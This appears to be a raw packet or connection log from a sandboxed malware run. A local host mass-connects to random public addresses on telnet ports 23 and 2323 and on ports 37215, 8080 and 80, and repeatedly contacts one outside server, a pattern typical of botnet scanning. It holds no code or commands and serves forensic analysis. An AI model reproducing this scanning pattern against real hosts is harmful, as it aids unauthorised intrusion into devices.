Feb 14, 2024 09:28:44.421267033 CET	1184	23	192.168.2.15	103.66.145.140
Feb 14, 2024 09:28:44.421272039 CET	1184	23	192.168.2.15	223.120.92.237
Feb 14, 2024 09:28:44.421286106 CET	1184	23	192.168.2.15	219.153.210.219
Feb 14, 2024 09:28:44.421289921 CET	1184	23	192.168.2.15	34.165.93.116
Feb 14, 2024 09:28:44.421289921 CET	1184	23	192.168.2.15	166.201.101.75
Feb 14, 2024 09:28:44.421291113 CET	1184	2323	192.168.2.15	158.42.21.19
Feb 14, 2024 09:28:44.421300888 CET	1184	23	192.168.2.15	23.225.113.75
Feb 14, 2024 09:28:44.421302080 CET	1184	23	192.168.2.15	162.249.172.73
Feb 14, 2024 09:28:44.421302080 CET	1184	23	192.168.2.15	180.182.193.64
Feb 14, 2024 09:28:44.421317101 CET	1184	23	192.168.2.15	185.27.98.226
Feb 14, 2024 09:28:44.421320915 CET	1184	23	192.168.2.15	100.46.45.61
Feb 14, 2024 09:28:44.421320915 CET	1184	23	192.168.2.15	130.211.212.31
Feb 14, 2024 09:28:44.421320915 CET	1184	2323	192.168.2.15	75.68.22.40
Feb 14, 2024 09:28:44.421320915 CET	1184	23	192.168.2.15	220.172.39.229
Feb 14, 2024 09:28:44.421320915 CET	1184	23	192.168.2.15	78.206.169.18
Feb 14, 2024 09:28:44.421322107 CET	1184	23	192.168.2.15	73.69.166.207
Feb 14, 2024 09:28:44.421320915 CET	1184	23	192.168.2.15	199.252.163.250
Feb 14, 2024 09:28:44.421320915 CET	1184	23	192.168.2.15	39.13.19.152
Feb 14, 2024 09:28:44.421320915 CET	1184	23	192.168.2.15	91.206.152.25
Feb 14, 2024 09:28:44.421334982 CET	1184	23	192.168.2.15	5.147.107.249
Feb 14, 2024 09:28:44.421340942 CET	1184	23	192.168.2.15	165.218.80.148
Feb 14, 2024 09:28:44.421359062 CET	1184	2323	192.168.2.15	182.247.163.73
Feb 14, 2024 09:28:44.421359062 CET	1184	23	192.168.2.15	151.136.36.18
Feb 14, 2024 09:28:44.421361923 CET	1184	23	192.168.2.15	150.93.176.71
Feb 14, 2024 09:28:44.421367884 CET	1184	23	192.168.2.15	221.35.90.146
Feb 14, 2024 09:28:44.421367884 CET	1184	23	192.168.2.15	168.78.136.202
Feb 14, 2024 09:28:44.421367884 CET	1184	23	192.168.2.15	204.197.68.178
Feb 14, 2024 09:28:44.421367884 CET	1184	23	192.168.2.15	117.244.148.73
Feb 14, 2024 09:28:44.421385050 CET	1184	23	192.168.2.15	184.237.18.103
Feb 14, 2024 09:28:44.421389103 CET	1184	23	192.168.2.15	126.197.157.21
Feb 14, 2024 09:28:44.421396971 CET	1184	2323	192.168.2.15	72.208.137.119
Feb 14, 2024 09:28:44.421397924 CET	1184	23	192.168.2.15	183.204.215.82
Feb 14, 2024 09:28:44.421413898 CET	1184	23	192.168.2.15	4.11.168.79
Feb 14, 2024 09:28:44.421416044 CET	1184	23	192.168.2.15	79.190.8.226
Feb 14, 2024 09:28:44.421417952 CET	1184	23	192.168.2.15	76.172.193.216
Feb 14, 2024 09:28:44.421421051 CET	1184	23	192.168.2.15	109.77.217.248
Feb 14, 2024 09:28:44.421426058 CET	1184	23	192.168.2.15	51.121.130.158
Feb 14, 2024 09:28:44.421437025 CET	1184	23	192.168.2.15	17.45.162.111
Feb 14, 2024 09:28:44.421446085 CET	1184	23	192.168.2.15	105.30.108.33
Feb 14, 2024 09:28:44.421458960 CET	1184	2323	192.168.2.15	142.40.185.175
Feb 14, 2024 09:28:44.421459913 CET	1184	23	192.168.2.15	101.140.61.23
Feb 14, 2024 09:28:44.421459913 CET	1184	23	192.168.2.15	154.198.196.114
Feb 14, 2024 09:28:44.421483040 CET	1184	23	192.168.2.15	106.2.137.170
Feb 14, 2024 09:28:44.421495914 CET	1184	23	192.168.2.15	189.128.46.105
Feb 14, 2024 09:28:44.421500921 CET	1184	23	192.168.2.15	164.199.79.205
Feb 14, 2024 09:28:44.421516895 CET	1184	23	192.168.2.15	160.185.28.77
Feb 14, 2024 09:28:44.421523094 CET	1184	23	192.168.2.15	76.58.64.202
Feb 14, 2024 09:28:44.421528101 CET	1184	23	192.168.2.15	116.231.106.117
Feb 14, 2024 09:28:44.421534061 CET	1184	2323	192.168.2.15	79.149.58.218
Feb 14, 2024 09:28:44.421539068 CET	1184	23	192.168.2.15	97.210.189.185
Feb 14, 2024 09:28:44.421562910 CET	1184	23	192.168.2.15	159.208.83.6
Feb 14, 2024 09:28:44.421564102 CET	1184	23	192.168.2.15	220.90.111.251
Feb 14, 2024 09:28:44.421565056 CET	1184	23	192.168.2.15	71.217.122.99
Feb 14, 2024 09:28:44.421576023 CET	1184	23	192.168.2.15	76.110.128.69
Feb 14, 2024 09:28:44.421576023 CET	1184	23	192.168.2.15	219.204.30.70
Feb 14, 2024 09:28:44.421581984 CET	1184	23	192.168.2.15	142.209.47.217
Feb 14, 2024 09:28:44.421581984 CET	1184	23	192.168.2.15	51.193.176.188
Feb 14, 2024 09:28:44.421588898 CET	1184	23	192.168.2.15	69.78.22.127
Feb 14, 2024 09:28:44.421601057 CET	1184	23	192.168.2.15	71.112.221.80
Feb 14, 2024 09:28:44.421602964 CET	1184	23	192.168.2.15	43.97.27.140
Feb 14, 2024 09:28:44.421610117 CET	1184	2323	192.168.2.15	217.88.23.130
Feb 14, 2024 09:28:44.421622992 CET	1184	23	192.168.2.15	72.219.11.180
Feb 14, 2024 09:28:44.421622992 CET	1184	23	192.168.2.15	66.52.159.104
Feb 14, 2024 09:28:44.421633959 CET	1184	23	192.168.2.15	53.210.193.39
Feb 14, 2024 09:28:44.421638012 CET	1184	23	192.168.2.15	81.109.137.34
Feb 14, 2024 09:28:44.421643972 CET	1184	23	192.168.2.15	45.113.175.119
Feb 14, 2024 09:28:44.421655893 CET	1184	23	192.168.2.15	87.160.66.242
Feb 14, 2024 09:28:44.421664000 CET	1184	23	192.168.2.15	96.57.248.116
Feb 14, 2024 09:28:44.421678066 CET	1184	2323	192.168.2.15	95.43.84.169
Feb 14, 2024 09:28:44.421684027 CET	1184	23	192.168.2.15	118.45.188.190
Feb 14, 2024 09:28:44.421694994 CET	1184	23	192.168.2.15	1.183.61.185
Feb 14, 2024 09:28:44.421699047 CET	1184	23	192.168.2.15	158.136.103.60
Feb 14, 2024 09:28:44.421711922 CET	1184	23	192.168.2.15	54.92.128.31
Feb 14, 2024 09:28:44.421711922 CET	1184	23	192.168.2.15	117.202.80.223
Feb 14, 2024 09:28:44.421713114 CET	1184	23	192.168.2.15	157.229.81.210
Feb 14, 2024 09:28:44.421713114 CET	1184	23	192.168.2.15	49.60.245.133
Feb 14, 2024 09:28:44.421725035 CET	1184	23	192.168.2.15	205.149.220.124
Feb 14, 2024 09:28:44.421735048 CET	1184	2323	192.168.2.15	135.244.3.168
Feb 14, 2024 09:28:44.421736002 CET	1184	23	192.168.2.15	175.155.132.174
Feb 14, 2024 09:28:44.421736956 CET	1184	23	192.168.2.15	136.254.128.110
Feb 14, 2024 09:28:44.421736956 CET	1184	23	192.168.2.15	63.220.254.34
Feb 14, 2024 09:28:44.421744108 CET	1184	23	192.168.2.15	49.136.216.65
Feb 14, 2024 09:28:44.421750069 CET	1184	23	192.168.2.15	146.197.183.141
Feb 14, 2024 09:28:44.421756029 CET	1184	23	192.168.2.15	190.71.248.52
Feb 14, 2024 09:28:44.421761036 CET	1184	23	192.168.2.15	200.163.188.0
Feb 14, 2024 09:28:44.421766996 CET	1184	23	192.168.2.15	20.166.201.85
Feb 14, 2024 09:28:44.421771049 CET	1184	23	192.168.2.15	79.75.165.231
Feb 14, 2024 09:28:44.421785116 CET	1184	23	192.168.2.15	183.49.120.156
Feb 14, 2024 09:28:44.421786070 CET	1184	23	192.168.2.15	74.127.110.95
Feb 14, 2024 09:28:44.421802998 CET	1184	23	192.168.2.15	102.249.29.216
Feb 14, 2024 09:28:44.421802998 CET	1184	2323	192.168.2.15	211.82.133.131
Feb 14, 2024 09:28:44.421811104 CET	1184	23	192.168.2.15	81.183.87.157
Feb 14, 2024 09:28:44.421821117 CET	1184	23	192.168.2.15	126.205.114.116
Feb 14, 2024 09:28:44.421830893 CET	1184	23	192.168.2.15	173.186.251.75
Feb 14, 2024 09:28:44.421834946 CET	1184	23	192.168.2.15	106.196.43.52
Feb 14, 2024 09:28:44.421843052 CET	1184	23	192.168.2.15	62.31.6.43
Feb 14, 2024 09:28:44.421854019 CET	1184	23	192.168.2.15	39.106.132.233
Feb 14, 2024 09:28:44.421858072 CET	1184	23	192.168.2.15	110.199.102.11
Feb 14, 2024 09:28:44.421859980 CET	1184	23	192.168.2.15	155.155.77.164
Feb 14, 2024 09:28:44.421876907 CET	1184	2323	192.168.2.15	140.212.120.169
Feb 14, 2024 09:28:44.421894073 CET	1184	23	192.168.2.15	158.236.205.250
Feb 14, 2024 09:28:44.421895981 CET	1184	23	192.168.2.15	222.206.16.12
Feb 14, 2024 09:28:44.421905994 CET	1184	23	192.168.2.15	204.111.233.186
Feb 14, 2024 09:28:44.421914101 CET	1184	23	192.168.2.15	133.243.4.159
Feb 14, 2024 09:28:44.421914101 CET	1184	23	192.168.2.15	181.38.10.33
Feb 14, 2024 09:28:44.421916962 CET	1184	23	192.168.2.15	136.249.197.81
Feb 14, 2024 09:28:44.421916962 CET	1184	23	192.168.2.15	58.230.216.247
Feb 14, 2024 09:28:44.421920061 CET	1184	23	192.168.2.15	150.175.18.201
Feb 14, 2024 09:28:44.421924114 CET	1184	23	192.168.2.15	155.68.23.147
Feb 14, 2024 09:28:44.421931982 CET	1184	2323	192.168.2.15	200.194.203.111
Feb 14, 2024 09:28:44.421932936 CET	1184	23	192.168.2.15	18.163.136.235
Feb 14, 2024 09:28:44.421942949 CET	1184	23	192.168.2.15	61.158.53.76
Feb 14, 2024 09:28:44.421953917 CET	1184	23	192.168.2.15	106.199.203.14
Feb 14, 2024 09:28:44.421968937 CET	1184	23	192.168.2.15	130.1.16.132
Feb 14, 2024 09:28:44.497812986 CET	8080	6752	95.164.97.170	192.168.2.15
Feb 14, 2024 09:28:44.542624950 CET	37215	8096	197.7.198.171	192.168.2.15
Feb 14, 2024 09:28:44.559396982 CET	23	1184	67.230.253.255	192.168.2.15
Feb 14, 2024 09:28:44.571985006 CET	8080	6752	85.189.148.170	192.168.2.15
Feb 14, 2024 09:28:44.583615065 CET	80	7840	95.142.252.89	192.168.2.15
Feb 14, 2024 09:28:44.584052086 CET	8080	6752	62.176.254.75	192.168.2.15
Feb 14, 2024 09:28:44.585578918 CET	37215	8096	197.9.96.189	192.168.2.15
Feb 14, 2024 09:28:44.586152077 CET	8080	6752	94.130.207.58	192.168.2.15
Feb 14, 2024 09:28:44.587106943 CET	8080	6752	94.127.186.55	192.168.2.15
Feb 14, 2024 09:28:44.587557077 CET	8080	6752	95.246.246.16	192.168.2.15
Feb 14, 2024 09:28:44.588280916 CET	23	1184	158.140.47.59	192.168.2.15
Feb 14, 2024 09:28:44.590714931 CET	80	7840	95.203.149.103	192.168.2.15
Feb 14, 2024 09:28:44.593276024 CET	37215	8096	197.7.115.249	192.168.2.15
Feb 14, 2024 09:28:44.594645023 CET	23	1184	166.151.43.62	192.168.2.15
Feb 14, 2024 09:28:44.594696999 CET	1184	23	192.168.2.15	166.151.43.62
Feb 14, 2024 09:28:44.602055073 CET	8080	6752	94.255.188.120	192.168.2.15
Feb 14, 2024 09:28:44.606332064 CET	80	7840	95.114.16.158	192.168.2.15
Feb 14, 2024 09:28:44.606419086 CET	7840	80	192.168.2.15	95.114.16.158
Feb 14, 2024 09:28:44.607295990 CET	8080	6752	62.211.118.169	192.168.2.15
Feb 14, 2024 09:28:44.609221935 CET	8080	6752	95.252.138.120	192.168.2.15
Feb 14, 2024 09:28:44.612485886 CET	80	7840	95.86.100.228	192.168.2.15
Feb 14, 2024 09:28:44.612571955 CET	7840	80	192.168.2.15	95.86.100.228
Feb 14, 2024 09:28:44.612643003 CET	8080	6752	95.43.239.21	192.168.2.15
Feb 14, 2024 09:28:44.612745047 CET	6752	8080	192.168.2.15	95.43.239.21
Feb 14, 2024 09:28:44.618844032 CET	8080	6752	62.105.132.133	192.168.2.15
Feb 14, 2024 09:28:44.620691061 CET	8080	6752	85.206.81.249	192.168.2.15
Feb 14, 2024 09:28:44.623397112 CET	8080	6752	94.120.32.187	192.168.2.15
Feb 14, 2024 09:28:44.623490095 CET	6752	8080	192.168.2.15	94.120.32.187
Feb 14, 2024 09:28:44.625488997 CET	8080	6752	62.29.47.155	192.168.2.15
Feb 14, 2024 09:28:44.625546932 CET	6752	8080	192.168.2.15	62.29.47.155
Feb 14, 2024 09:28:44.629775047 CET	1024	38980	141.98.10.72	192.168.2.15
Feb 14, 2024 09:28:44.629831076 CET	38980	1024	192.168.2.15	141.98.10.72
Feb 14, 2024 09:28:44.630224943 CET	38980	1024	192.168.2.15	141.98.10.72
Feb 14, 2024 09:28:44.650755882 CET	8080	6752	94.43.15.247	192.168.2.15
Feb 14, 2024 09:28:44.653067112 CET	8080	6752	95.156.252.134	192.168.2.15
Feb 14, 2024 09:28:44.680921078 CET	8080	6752	94.74.123.186	192.168.2.15
Feb 14, 2024 09:28:44.710874081 CET	23	1184	112.180.173.50	192.168.2.15
Feb 14, 2024 09:28:44.718086004 CET	2323	1184	1.248.131.225	192.168.2.15
Feb 14, 2024 09:28:44.749270916 CET	23	1184	83.245.221.40	192.168.2.15
Feb 14, 2024 09:28:44.776014090 CET	23	1184	36.93.229.211	192.168.2.15
Feb 14, 2024 09:28:44.850929022 CET	1024	38980	141.98.10.72	192.168.2.15
Feb 14, 2024 09:28:44.851022005 CET	38980	1024	192.168.2.15	141.98.10.72
Feb 14, 2024 09:28:45.071779966 CET	1024	38980	141.98.10.72	192.168.2.15
Feb 14, 2024 09:28:45.286825895 CET	8096	37215	192.168.2.15	157.46.217.79
Feb 14, 2024 09:28:45.286844969 CET	8096	37215	192.168.2.15	157.132.13.175
Feb 14, 2024 09:28:45.286844969 CET	8096	37215	192.168.2.15	157.208.9.25
Feb 14, 2024 09:28:45.286845922 CET	8096	37215	192.168.2.15	157.177.51.198
Feb 14, 2024 09:28:45.286844969 CET	8096	37215	192.168.2.15	157.26.42.65
Feb 14, 2024 09:28:45.286859035 CET	8096	37215	192.168.2.15	157.70.42.132
Feb 14, 2024 09:28:45.286863089 CET	8096	37215	192.168.2.15	157.78.13.73
Feb 14, 2024 09:28:45.286865950 CET	8096	37215	192.168.2.15	157.241.150.185
Feb 14, 2024 09:28:45.286895990 CET	8096	37215	192.168.2.15	157.184.30.206
Feb 14, 2024 09:28:45.286910057 CET	8096	37215	192.168.2.15	157.163.116.196
Feb 14, 2024 09:28:45.286911964 CET	8096	37215	192.168.2.15	157.63.72.50
Feb 14, 2024 09:28:45.286933899 CET	8096	37215	192.168.2.15	157.74.10.66
Feb 14, 2024 09:28:45.286952972 CET	8096	37215	192.168.2.15	157.229.102.83
Feb 14, 2024 09:28:45.286964893 CET	8096	37215	192.168.2.15	157.128.217.185
Feb 14, 2024 09:28:45.286981106 CET	8096	37215	192.168.2.15	157.127.141.131
Feb 14, 2024 09:28:45.287000895 CET	8096	37215	192.168.2.15	157.84.229.133
Feb 14, 2024 09:28:45.287020922 CET	8096	37215	192.168.2.15	157.214.108.200
Feb 14, 2024 09:28:45.287020922 CET	8096	37215	192.168.2.15	157.142.100.166
Feb 14, 2024 09:28:45.287026882 CET	8096	37215	192.168.2.15	157.166.21.130
Feb 14, 2024 09:28:45.287039995 CET	8096	37215	192.168.2.15	157.23.85.160
Feb 14, 2024 09:28:45.287066936 CET	8096	37215	192.168.2.15	157.42.39.121
Feb 14, 2024 09:28:45.287066936 CET	8096	37215	192.168.2.15	157.64.49.108
Feb 14, 2024 09:28:45.287100077 CET	8096	37215	192.168.2.15	157.107.253.27
Feb 14, 2024 09:28:45.287141085 CET	8096	37215	192.168.2.15	157.116.141.244
Feb 14, 2024 09:28:45.287146091 CET	8096	37215	192.168.2.15	157.117.226.117
Feb 14, 2024 09:28:45.287175894 CET	8096	37215	192.168.2.15	157.125.131.176
Feb 14, 2024 09:28:45.287180901 CET	8096	37215	192.168.2.15	157.104.120.13
Feb 14, 2024 09:28:45.287206888 CET	8096	37215	192.168.2.15	157.144.66.114
Feb 14, 2024 09:28:45.287220955 CET	8096	37215	192.168.2.15	157.225.137.196
Feb 14, 2024 09:28:45.287250996 CET	8096	37215	192.168.2.15	157.7.200.95
Feb 14, 2024 09:28:45.287257910 CET	8096	37215	192.168.2.15	157.181.255.155
Feb 14, 2024 09:28:45.287272930 CET	8096	37215	192.168.2.15	157.38.50.243
Feb 14, 2024 09:28:45.287343979 CET	8096	37215	192.168.2.15	157.151.247.10
Feb 14, 2024 09:28:45.287343979 CET	8096	37215	192.168.2.15	157.43.128.215
Feb 14, 2024 09:28:45.287344933 CET	8096	37215	192.168.2.15	157.158.160.134
Feb 14, 2024 09:28:45.287354946 CET	8096	37215	192.168.2.15	157.157.122.177
Feb 14, 2024 09:28:45.287354946 CET	8096	37215	192.168.2.15	157.1.236.77
Feb 14, 2024 09:28:45.287364006 CET	8096	37215	192.168.2.15	157.38.25.235
Feb 14, 2024 09:28:45.287414074 CET	8096	37215	192.168.2.15	157.89.129.158
Feb 14, 2024 09:28:45.287431955 CET	8096	37215	192.168.2.15	157.75.148.167
Feb 14, 2024 09:28:45.287441969 CET	8096	37215	192.168.2.15	157.53.160.208
Feb 14, 2024 09:28:45.287465096 CET	8096	37215	192.168.2.15	157.237.133.35
Feb 14, 2024 09:28:45.287465096 CET	8096	37215	192.168.2.15	157.125.162.105
Feb 14, 2024 09:28:45.287482977 CET	8096	37215	192.168.2.15	157.38.254.53
Feb 14, 2024 09:28:45.287491083 CET	8096	37215	192.168.2.15	157.69.202.37
Feb 14, 2024 09:28:45.287518978 CET	8096	37215	192.168.2.15	157.86.238.35
Feb 14, 2024 09:28:45.287523031 CET	8096	37215	192.168.2.15	157.144.144.152
Feb 14, 2024 09:28:45.287554026 CET	8096	37215	192.168.2.15	157.149.230.80
Feb 14, 2024 09:28:45.287575006 CET	8096	37215	192.168.2.15	157.226.55.159
Feb 14, 2024 09:28:45.287590981 CET	8096	37215	192.168.2.15	157.32.44.8
Feb 14, 2024 09:28:45.287619114 CET	8096	37215	192.168.2.15	157.107.136.53
Feb 14, 2024 09:28:45.287619114 CET	8096	37215	192.168.2.15	157.178.22.4
Feb 14, 2024 09:28:45.287633896 CET	8096	37215	192.168.2.15	157.25.76.253
Feb 14, 2024 09:28:45.287646055 CET	8096	37215	192.168.2.15	157.103.75.196
Feb 14, 2024 09:28:45.287664890 CET	8096	37215	192.168.2.15	157.50.196.145
Feb 14, 2024 09:28:45.287664890 CET	8096	37215	192.168.2.15	157.220.177.203
Feb 14, 2024 09:28:45.287691116 CET	8096	37215	192.168.2.15	157.3.11.233
Feb 14, 2024 09:28:45.287699938 CET	8096	37215	192.168.2.15	157.124.253.149
Feb 14, 2024 09:28:45.287704945 CET	8096	37215	192.168.2.15	157.247.34.16
Feb 14, 2024 09:28:45.287725925 CET	8096	37215	192.168.2.15	157.216.233.248
Feb 14, 2024 09:28:45.287736893 CET	8096	37215	192.168.2.15	157.204.203.70
Feb 14, 2024 09:28:45.287755966 CET	8096	37215	192.168.2.15	157.59.192.57
Feb 14, 2024 09:28:45.287781000 CET	8096	37215	192.168.2.15	157.244.72.155
Feb 14, 2024 09:28:45.287784100 CET	8096	37215	192.168.2.15	157.52.31.250
Feb 14, 2024 09:28:45.287817955 CET	8096	37215	192.168.2.15	157.54.199.46
Feb 14, 2024 09:28:45.287825108 CET	8096	37215	192.168.2.15	157.145.247.210
Feb 14, 2024 09:28:45.287867069 CET	8096	37215	192.168.2.15	157.104.22.10
Feb 14, 2024 09:28:45.287869930 CET	8096	37215	192.168.2.15	157.178.12.81
Feb 14, 2024 09:28:45.287904978 CET	8096	37215	192.168.2.15	157.183.66.187
Feb 14, 2024 09:28:45.287904978 CET	8096	37215	192.168.2.15	157.15.159.68
Feb 14, 2024 09:28:45.287950039 CET	8096	37215	192.168.2.15	157.31.241.12
Feb 14, 2024 09:28:45.287980080 CET	8096	37215	192.168.2.15	157.138.12.38
Feb 14, 2024 09:28:45.288011074 CET	8096	37215	192.168.2.15	157.217.99.41
Feb 14, 2024 09:28:45.288039923 CET	8096	37215	192.168.2.15	157.65.220.180
Feb 14, 2024 09:28:45.288063049 CET	8096	37215	192.168.2.15	157.216.215.38
Feb 14, 2024 09:28:45.288065910 CET	8096	37215	192.168.2.15	157.155.138.194
Feb 14, 2024 09:28:45.288105011 CET	8096	37215	192.168.2.15	157.154.220.127
Feb 14, 2024 09:28:45.288106918 CET	8096	37215	192.168.2.15	157.117.225.7
Feb 14, 2024 09:28:45.288106918 CET	8096	37215	192.168.2.15	157.130.114.96
Feb 14, 2024 09:28:45.288106918 CET	8096	37215	192.168.2.15	157.59.16.215
Feb 14, 2024 09:28:45.288106918 CET	8096	37215	192.168.2.15	157.155.34.29
Feb 14, 2024 09:28:45.288121939 CET	8096	37215	192.168.2.15	157.219.18.225
Feb 14, 2024 09:28:45.288121939 CET	8096	37215	192.168.2.15	157.4.225.122
Feb 14, 2024 09:28:45.288186073 CET	8096	37215	192.168.2.15	157.158.52.172
Feb 14, 2024 09:28:45.288192034 CET	8096	37215	192.168.2.15	157.151.222.236
Feb 14, 2024 09:28:45.288220882 CET	8096	37215	192.168.2.15	157.126.109.132
Feb 14, 2024 09:28:45.288223982 CET	8096	37215	192.168.2.15	157.55.130.79
Feb 14, 2024 09:28:45.288264036 CET	8096	37215	192.168.2.15	157.212.88.247
Feb 14, 2024 09:28:45.288264036 CET	8096	37215	192.168.2.15	157.216.25.48
Feb 14, 2024 09:28:45.288269997 CET	8096	37215	192.168.2.15	157.233.3.74
Feb 14, 2024 09:28:45.288285017 CET	8096	37215	192.168.2.15	157.48.141.45
Feb 14, 2024 09:28:45.288307905 CET	8096	37215	192.168.2.15	157.169.97.86
Feb 14, 2024 09:28:45.288311958 CET	8096	37215	192.168.2.15	157.58.221.154
Feb 14, 2024 09:28:45.288326025 CET	8096	37215	192.168.2.15	157.153.183.30
Feb 14, 2024 09:28:45.288378000 CET	8096	37215	192.168.2.15	157.230.121.219
Feb 14, 2024 09:28:45.288383961 CET	8096	37215	192.168.2.15	157.93.255.14
Feb 14, 2024 09:28:45.288388968 CET	8096	37215	192.168.2.15	157.85.99.171
Feb 14, 2024 09:28:45.288408995 CET	8096	37215	192.168.2.15	157.112.70.201
Feb 14, 2024 09:28:45.288472891 CET	8096	37215	192.168.2.15	157.6.215.220
Feb 14, 2024 09:28:45.288475990 CET	8096	37215	192.168.2.15	157.81.169.136
Feb 14, 2024 09:28:45.288494110 CET	8096	37215	192.168.2.15	157.199.177.122
Feb 14, 2024 09:28:45.288500071 CET	8096	37215	192.168.2.15	157.254.4.51
Feb 14, 2024 09:28:45.288500071 CET	8096	37215	192.168.2.15	157.120.109.42
Feb 14, 2024 09:28:45.288533926 CET	8096	37215	192.168.2.15	157.133.214.159
Feb 14, 2024 09:28:45.288558960 CET	8096	37215	192.168.2.15	157.160.100.170
Feb 14, 2024 09:28:45.288574934 CET	8096	37215	192.168.2.15	157.34.231.119
Feb 14, 2024 09:28:45.288587093 CET	8096	37215	192.168.2.15	157.89.6.109
Feb 14, 2024 09:28:45.288587093 CET	8096	37215	192.168.2.15	157.39.154.164
Feb 14, 2024 09:28:45.288589001 CET	8096	37215	192.168.2.15	157.82.47.253
Feb 14, 2024 09:28:45.288599968 CET	8096	37215	192.168.2.15	157.24.154.31
Feb 14, 2024 09:28:45.288633108 CET	8096	37215	192.168.2.15	157.7.118.74
Feb 14, 2024 09:28:45.288671017 CET	8096	37215	192.168.2.15	157.55.127.9
Feb 14, 2024 09:28:45.288671017 CET	8096	37215	192.168.2.15	157.230.61.242
Feb 14, 2024 09:28:45.288710117 CET	8096	37215	192.168.2.15	157.182.119.220
Feb 14, 2024 09:28:45.288714886 CET	8096	37215	192.168.2.15	157.82.88.214
Feb 14, 2024 09:28:45.288728952 CET	8096	37215	192.168.2.15	157.111.124.8
Feb 14, 2024 09:28:45.288752079 CET	8096	37215	192.168.2.15	157.171.219.0
Feb 14, 2024 09:28:45.288753033 CET	8096	37215	192.168.2.15	157.141.181.52
Feb 14, 2024 09:28:45.288795948 CET	8096	37215	192.168.2.15	157.116.42.6
Feb 14, 2024 09:28:45.288799047 CET	8096	37215	192.168.2.15	157.18.62.131
Feb 14, 2024 09:28:45.288801908 CET	8096	37215	192.168.2.15	157.31.83.60
Feb 14, 2024 09:28:45.288815022 CET	8096	37215	192.168.2.15	157.248.89.32
Feb 14, 2024 09:28:45.288840055 CET	8096	37215	192.168.2.15	157.142.59.240
Feb 14, 2024 09:28:45.288846970 CET	8096	37215	192.168.2.15	157.188.67.252
Feb 14, 2024 09:28:45.288871050 CET	8096	37215	192.168.2.15	157.49.1.251
Feb 14, 2024 09:28:45.288876057 CET	8096	37215	192.168.2.15	157.223.119.167
Feb 14, 2024 09:28:45.288885117 CET	8096	37215	192.168.2.15	157.189.249.152
Feb 14, 2024 09:28:45.288913012 CET	8096	37215	192.168.2.15	157.131.113.116
Feb 14, 2024 09:28:45.288913012 CET	8096	37215	192.168.2.15	157.203.14.113
Feb 14, 2024 09:28:45.288949966 CET	8096	37215	192.168.2.15	157.235.216.200
Feb 14, 2024 09:28:45.288950920 CET	8096	37215	192.168.2.15	157.250.45.170
Feb 14, 2024 09:28:45.288970947 CET	8096	37215	192.168.2.15	157.184.239.217
Feb 14, 2024 09:28:45.288970947 CET	8096	37215	192.168.2.15	157.38.54.127
Feb 14, 2024 09:28:45.289005995 CET	8096	37215	192.168.2.15	157.27.252.10
Feb 14, 2024 09:28:45.289007902 CET	8096	37215	192.168.2.15	157.95.4.39
Feb 14, 2024 09:28:45.289036036 CET	8096	37215	192.168.2.15	157.205.255.173
Feb 14, 2024 09:28:45.289038897 CET	8096	37215	192.168.2.15	157.229.25.236
Feb 14, 2024 09:28:45.289076090 CET	8096	37215	192.168.2.15	157.117.152.246
Feb 14, 2024 09:28:45.289124966 CET	8096	37215	192.168.2.15	157.23.142.9
Feb 14, 2024 09:28:45.289124966 CET	8096	37215	192.168.2.15	157.96.255.202
Feb 14, 2024 09:28:45.289149046 CET	8096	37215	192.168.2.15	157.178.245.252
Feb 14, 2024 09:28:45.289169073 CET	8096	37215	192.168.2.15	157.232.144.18
Feb 14, 2024 09:28:45.289180040 CET	8096	37215	192.168.2.15	157.81.37.195
Feb 14, 2024 09:28:45.289200068 CET	8096	37215	192.168.2.15	157.44.35.1
Feb 14, 2024 09:28:45.289215088 CET	8096	37215	192.168.2.15	157.18.222.226
Feb 14, 2024 09:28:45.289241076 CET	8096	37215	192.168.2.15	157.189.208.117
Feb 14, 2024 09:28:45.289248943 CET	8096	37215	192.168.2.15	157.150.126.144
Feb 14, 2024 09:28:45.289316893 CET	8096	37215	192.168.2.15	157.70.30.166
Feb 14, 2024 09:28:45.289330959 CET	8096	37215	192.168.2.15	157.8.5.24
Feb 14, 2024 09:28:45.289351940 CET	8096	37215	192.168.2.15	157.244.43.211
Feb 14, 2024 09:28:45.289355993 CET	8096	37215	192.168.2.15	157.186.25.94
Feb 14, 2024 09:28:45.289371014 CET	8096	37215	192.168.2.15	157.131.188.165
Feb 14, 2024 09:28:45.289371967 CET	8096	37215	192.168.2.15	157.94.114.88
Feb 14, 2024 09:28:45.289386988 CET	8096	37215	192.168.2.15	157.32.181.210
Feb 14, 2024 09:28:45.289391994 CET	8096	37215	192.168.2.15	157.240.137.111
Feb 14, 2024 09:28:45.289427042 CET	8096	37215	192.168.2.15	157.178.146.2
Feb 14, 2024 09:28:45.289427996 CET	8096	37215	192.168.2.15	157.197.215.76
Feb 14, 2024 09:28:45.289442062 CET	8096	37215	192.168.2.15	157.120.171.8
Feb 14, 2024 09:28:45.289469957 CET	8096	37215	192.168.2.15	157.14.133.209
Feb 14, 2024 09:28:45.289572001 CET	8096	37215	192.168.2.15	157.112.215.96
Feb 14, 2024 09:28:45.362660885 CET	7840	80	192.168.2.15	88.58.254.12
Feb 14, 2024 09:28:45.362690926 CET	7840	80	192.168.2.15	88.103.78.52
Feb 14, 2024 09:28:45.362692118 CET	7840	80	192.168.2.15	88.161.198.169
Feb 14, 2024 09:28:45.362728119 CET	7840	80	192.168.2.15	88.25.1.144
Feb 14, 2024 09:28:45.362746000 CET	7840	80	192.168.2.15	88.135.38.139
Feb 14, 2024 09:28:45.362783909 CET	7840	80	192.168.2.15	88.182.216.251
Feb 14, 2024 09:28:45.362807035 CET	7840	80	192.168.2.15	88.251.211.96
Feb 14, 2024 09:28:45.362808943 CET	7840	80	192.168.2.15	88.233.196.78
Feb 14, 2024 09:28:45.362808943 CET	7840	80	192.168.2.15	88.4.137.197
Feb 14, 2024 09:28:45.362808943 CET	7840	80	192.168.2.15	88.199.55.49
Feb 14, 2024 09:28:45.362811089 CET	7840	80	192.168.2.15	88.114.4.155
Feb 14, 2024 09:28:45.362811089 CET	7840	80	192.168.2.15	88.205.223.219
Feb 14, 2024 09:28:45.362831116 CET	7840	80	192.168.2.15	88.245.2.157
Feb 14, 2024 09:28:45.362845898 CET	7840	80	192.168.2.15	88.191.218.1
Feb 14, 2024 09:28:45.362859964 CET	7840	80	192.168.2.15	88.106.83.83
Feb 14, 2024 09:28:45.362874031 CET	7840	80	192.168.2.15	88.140.18.198
Feb 14, 2024 09:28:45.362878084 CET	7840	80	192.168.2.15	88.43.156.123
Feb 14, 2024 09:28:45.362879992 CET	7840	80	192.168.2.15	88.190.53.6
Feb 14, 2024 09:28:45.362935066 CET	7840	80	192.168.2.15	88.155.172.83
